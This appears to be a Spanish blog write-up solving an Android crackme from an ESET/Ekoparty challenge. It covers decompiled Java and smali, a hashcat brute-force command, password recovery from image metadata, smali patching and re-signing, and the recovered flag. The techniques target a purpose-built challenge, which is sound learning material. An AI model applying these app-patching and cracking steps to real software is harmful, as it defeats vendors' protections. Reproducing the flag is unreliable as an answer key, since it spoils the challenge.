<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCpTwnRsdYhCKAaS-QZ4MRFN59jK5RB1e1BpY_9J-nIXDRFkCIkiFvf7FRCUg2d6hMVfrByxosDEXLnAyEr0xXS6kllZwmuowa6EMamOpxf6TFA1P-FU0cQJ4ngmSOfP53OJzIlqVFaA/s1600/Activity2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCpTwnRsdYhCKAaS-QZ4MRFN59jK5RB1e1BpY_9J-nIXDRFkCIkiFvf7FRCUg2d6hMVfrByxosDEXLnAyEr0xXS6kllZwmuowa6EMamOpxf6TFA1P-FU0cQJ4ngmSOfP53OJzIlqVFaA/s640/Activity2.jpg" width="640" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">Para arrancar la actividad modificamos el </span><span style="color: #444444;">AndroidManifest.xml para que arranque la </span><span style="color: #444444;">SuperbActivity y luego volvemos a compilar y firmar.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88p_oybQoFfXNtfn5DgNW62KNtT3KlIgYuCwbo4dJ9PW9FEVVIpoy8nEkk7UFBSyJ_2HWWwBZpJ5TNCnHAyo1EEonyuKGdvkaT58450E0tQQCgosdykABWZQXTf_6wyLOy6r-jxxhVE/s1600/manifest-crack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU88p_oybQoFfXNtfn5DgNW62KNtT3KlIgYuCwbo4dJ9PW9FEVVIpoy8nEkk7UFBSyJ_2HWWwBZpJ5TNCnHAyo1EEonyuKGdvkaT58450E0tQQCgosdykABWZQXTf_6wyLOy6r-jxxhVE/s640/manifest-crack.jpg" width="640" /></a></div>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Así vamos a obtener una segunda aplicación que siempre arrancará la actividad correcta para resolver este reto, por lo que a partir de ahora seguiremos trabajando con ella.</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">La arrancamos y vemos lo siguiente:</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVswDRzrUcwCqhhfGFfLsT0gvTiby0mvRUY5Ltvs_aacLRmrYb7xa0xv6rVQPh6kflxCkSX-NlWHNJmWN2wBgQb6uck1oDpPKPA3rYzU3lyfp3JkD5i0xhO5VDVrLQD6Tjl0OnvR05HA/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVswDRzrUcwCqhhfGFfLsT0gvTiby0mvRUY5Ltvs_aacLRmrYb7xa0xv6rVQPh6kflxCkSX-NlWHNJmWN2wBgQb6uck1oDpPKPA3rYzU3lyfp3JkD5i0xhO5VDVrLQD6Tjl0OnvR05HA/s400/06.jpg" width="257" /></a></div>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Una imagen de Fsociety y un contador decreciente, no tenemos ningún ingreso de datos como en el apk de la Parte 1.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><b>En el código vemos</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><b><br /></b></span>
<br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">try</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((SuperbActivity.b <= 0.0D) && (SuperbActivity.a < 0))</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.a += 1;</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.access$002(SuperbActivity.this, 10.0D * (int)Math.log(Math.pow(SuperbActivity.a, SuperbActivity.a)));</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.b = SuperbActivity.this.c;</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> String str = SuperbActivity.this.getPreferences(4).getString("password", "no_password");</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (e.<b>SHA1</b>(str).equalsIgnoreCase("<b>249192f0a4f70aa25aa5c7521625f7d6e4021042</b>"))</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> new a().execute(new b[] { new b(SuperbActivity.this.getApplicationContext(),<b> d.decrypt(str, "Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=")) });</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.this.t.setText(String.format("Próximo intento: %.1f", new Object[] { Double.valueOf(SuperbActivity.b) }));</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.b -= 0.1D;</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> SuperbActivity.this.g.postDelayed(this, 100L);</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return;</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> catch (Exception localException)</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><b> Log.e(SuperbActivity.this.getResources().getString(2131099668), "Oops!");</b></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><span style="background-color: white;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #444444;">Podemos observar que por otro lado hay un hash de <b>SHA1 </b>y un <b>d.decrypt</b> que toma como ingreso la cadena </span><b style="color: #444444;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=</b></span><br />
<b style="color: #444444; font-family: arial, helvetica, sans-serif; font-size: small;"><br /></b>
<b style="color: #444444; font-family: arial, helvetica, sans-serif; font-size: small;"><br /></b>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><b>Vemos también:</b></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> protected void onCreate(Bundle paramBundle)</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> {</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">......................................</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> paramBundle.putString("password", "<b>insert_password_here</b>");</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> paramBundle.apply();</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-size: 13px;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> }</span></span><br />
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;">Revisando el codigo SMALI veo lo siguiente:</span></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">.source "SuperbActivity.java"</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .line 61</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .local v0, "editor":Landroid/content/SharedPreferences$Editor;</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-size: 13px;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> const-string v2, "password"</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="color: #444444;">Significa que existe una shared memory en la cual deberemos poner una clave para que luego sea comparada con el hash del SHA1 y si machea se ejecuta la función </span><b>d.decrypt("clave",</b></span></span><b style="font-family: Arial, Helvetica, sans-serif;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=)</b><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">Busque el hash por internet sin suerte, por lo que intente con hashcat y probar una clave de 10 dígitos incremental....</span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">hashcat64.exe -m 100 -a 3 example0.hash ?s?s?s?s?s?s?s?s?s?s --incremental </span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Probé con solo numéricos, con alfa + may/minusculas sin éxito, para luego pasar al set con caracteres espaciales. Hasta los siete<span style="background-color: white; color: #444444;"> caracteres fue rápido y luego paso de horas a días y </span><span style="background-color: white; color: #444444;">años... por lo que descartamos esté método</span><span style="background-color: white; color: #444444;"> debido a que un reto en una confer no nos puede llevar tanto tiempo a menos que tengamos una maquina cuántica</span><span style="background-color: white; color: #444444;">...</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Probe con hashcat porque al ver a Obi se me vino a la mente "Usa la Fuerza"...fuerza bruta....mmmm.... no...no.... solo fue una trampita :D</span></span><br />
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">La password debería estar en otro lugar, revisando las imágenes de los recursos se las pase al exiftool y en la imagen de fsociety se puede ver lo siguiente en el </span></span><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Thumbnail</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<span style="background-color: white;"><span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">exiftool -b -ThumbnailImage image.jpg > my_thumbnail.jpg</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6vOw-A-YBVLtTr7g0wsbrEWqpePQadltW7R5tXPv__Dcqpt9NhDBHMqvxieiNeF5tA62SpUm4Nv8F00YH9CoERs3V3DukDiVtzUnGJYv_RF2pGbdqknLnxHLv8WjYH_W4PIlzPwFJdUc/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6vOw-A-YBVLtTr7g0wsbrEWqpePQadltW7R5tXPv__Dcqpt9NhDBHMqvxieiNeF5tA62SpUm4Nv8F00YH9CoERs3V3DukDiVtzUnGJYv_RF2pGbdqknLnxHLv8WjYH_W4PIlzPwFJdUc/s320/05.jpg" width="266" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ahora que tengo la password <b>r4bb!th0l3</b> se la puedo poner en el shared memory con el ADM en /data/data/eset.ekoparty.challenge.crackmeharder/shared_prefs/SuperbActivity.xml</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3WJ4IQrnUSciC1MOpnA3NRLdafIqI6xBopa0ordF_c1nYGygEYqVhi_XBeFcnFYmNRM6H1VUowLEBMu40ohyphenhyphenXSm8UysbtcM3ehsfsjrmXFoL2KXYkHWd6u5lxH56LbTBYyVazKLHUM-c/s1600/ADM.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3WJ4IQrnUSciC1MOpnA3NRLdafIqI6xBopa0ordF_c1nYGygEYqVhi_XBeFcnFYmNRM6H1VUowLEBMu40ohyphenhyphenXSm8UysbtcM3ehsfsjrmXFoL2KXYkHWd6u5lxH56LbTBYyVazKLHUM-c/s640/ADM.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLq6KTwd1S0Ait_jdrXXkfeQW4W2Uw0y4C56Ft2cJ7pmI8VOyyvadbmF0kY5UjN-QXpZhL_e2Q62CdBITw8paNOcy81Lcnhzo33BXF2aYNkIxw_-rPM9nF0RXqvJtb8ONnXDXc9OLfG1Q/s1600/recurso-password.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLq6KTwd1S0Ait_jdrXXkfeQW4W2Uw0y4C56Ft2cJ7pmI8VOyyvadbmF0kY5UjN-QXpZhL_e2Q62CdBITw8paNOcy81Lcnhzo33BXF2aYNkIxw_-rPM9nF0RXqvJtb8ONnXDXc9OLfG1Q/s400/recurso-password.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O asignar la password directamente en el SuperbActivity.smali</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> y me olvido.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Lógicamente vuelvo a compilar y firmar la aplicación.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">.source "SuperbActivity.java"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> .line 61</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> .local v0, "editor":Landroid/content/SharedPreferences$Editor;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> const-string v2, "password"</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"> const-string v3, "r4bb!th0l3"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px;"><br /></span></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Cuando machea el SHA1, como habíamos comentado antes, se </span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">ejecuta </span><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><b>d.decrypt( </b></span></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>r4bb!th0l3,</b></span><b style="font-family: Arial, Helvetica, sans-serif;">Jhv1Bk0Qi07jOVEeyImynOQmiiz1MvZakazhOaAld-0=) </b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">obteniendo como resultado el string</span><b style="font-family: Arial, Helvetica, sans-serif;"> </b><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>f0ll0w_th3_wh!t3_r4bb!t!</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Acá la podemos ver en un dump de memoria previo.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8biTlmpXuamo7BIxHUSgkVcf4IReOk1tp1GZzfJ_tpOdPRqeTUs1dhjq2KxffWlWbZ2CEaeEt4va5j93GlQz0JFTYkjUnDYCLHsnAnUQyzx644qo7KNOoJNM7Jtq32_5YjOelLn_-is/s1600/clave.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ8biTlmpXuamo7BIxHUSgkVcf4IReOk1tp1GZzfJ_tpOdPRqeTUs1dhjq2KxffWlWbZ2CEaeEt4va5j93GlQz0JFTYkjUnDYCLHsnAnUQyzx644qo7KNOoJNM7Jtq32_5YjOelLn_-is/s640/clave.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Cada vez que el contador se pone en cero o se da click en el label, el apk llama a la class b y visita un sitio.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.this.t.setText(String.format("Próximo intento: %.1f", new Object[] { Double.valueOf(SuperbActivity.b) }));</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.b -= 0.1D;</span></span><br />
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> SuperbActivity.this.g.postDelayed(this, 100L);</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">class b</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">{</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> .................................</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> String getUrl()</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> {</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> <b> return "http://desafioseset.com/";</b></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"> }</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; font-size: 13px;"></span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;">}</span></span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">En el LOGCAT se ve lo siguiente</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt1W1E8ExuWGOPlU2lL4UJmvCYvwsSem4qt8xQIPwIV8KgSh_bpXcpILGysm-LS8pz5sW35mcoTbMCOsJzmR2_KfZlDhDfCYtRp1HYduETZOw2I2PEirOPUdMi3ueBoD79rD7PcBPFMw/s1600/el+flag+esta+en+memoria.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt1W1E8ExuWGOPlU2lL4UJmvCYvwsSem4qt8xQIPwIV8KgSh_bpXcpILGysm-LS8pz5sW35mcoTbMCOsJzmR2_KfZlDhDfCYtRp1HYduETZOw2I2PEirOPUdMi3ueBoD79rD7PcBPFMw/s1600/el+flag+esta+en+memoria.jpg" /></a></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Por otro lado se llama a la Class n a la cual se le pasa el string </span><b style="font-family: Arial, Helvetica, sans-serif;">f0ll0w_th3_wh!t3_r4bb!t!</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"> SuperbActivity.FLAG = new n().func(localb.getKeyword());</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">class n</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">{</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> static</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> {</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> System.loadLibrary("dostuff");</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> }</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;">Por lo que si hacemos un DUMP de la memoria.</span><br />
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdryKk4DEII0NH_9A8zTLKmUtlh0hK4Yty52uc03pomYJ-CKom9WnBP0rui1Ahylkl0MOOQq1xrqmr_BjSFrqCkXd4J0Ohb3p0wrn4q4oHq-wKyFMLgquCw4S3ZQmJi56j2gFD2LHiPGI/s1600/dumpear.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdryKk4DEII0NH_9A8zTLKmUtlh0hK4Yty52uc03pomYJ-CKom9WnBP0rui1Ahylkl0MOOQq1xrqmr_BjSFrqCkXd4J0Ohb3p0wrn4q4oHq-wKyFMLgquCw4S3ZQmJi56j2gFD2LHiPGI/s400/dumpear.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Obtenemos la FLAG :D</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">eko_eset_m0b!l35</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ7Gc2wVz9K10M5OBgN669zQIzN8Bz_veC5UHHmwO7RWijXk7tFg-ECyKhIKYJYMPLuKJFLDywL8pCCeSmfT2XQhab-dSxihMJ_RexONkTs5_VRdaIEojtPU_CCjN3AqaX5aIX3rlQr5M/s1600/LA-FLAG.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ7Gc2wVz9K10M5OBgN669zQIzN8Bz_veC5UHHmwO7RWijXk7tFg-ECyKhIKYJYMPLuKJFLDywL8pCCeSmfT2XQhab-dSxihMJ_RexONkTs5_VRdaIEojtPU_CCjN3AqaX5aIX3rlQr5M/s640/LA-FLAG.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">El APK lo deje modificado para que ingrese directamente a la actividad que corresponde, tome la clave y la imprima en el logcat.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
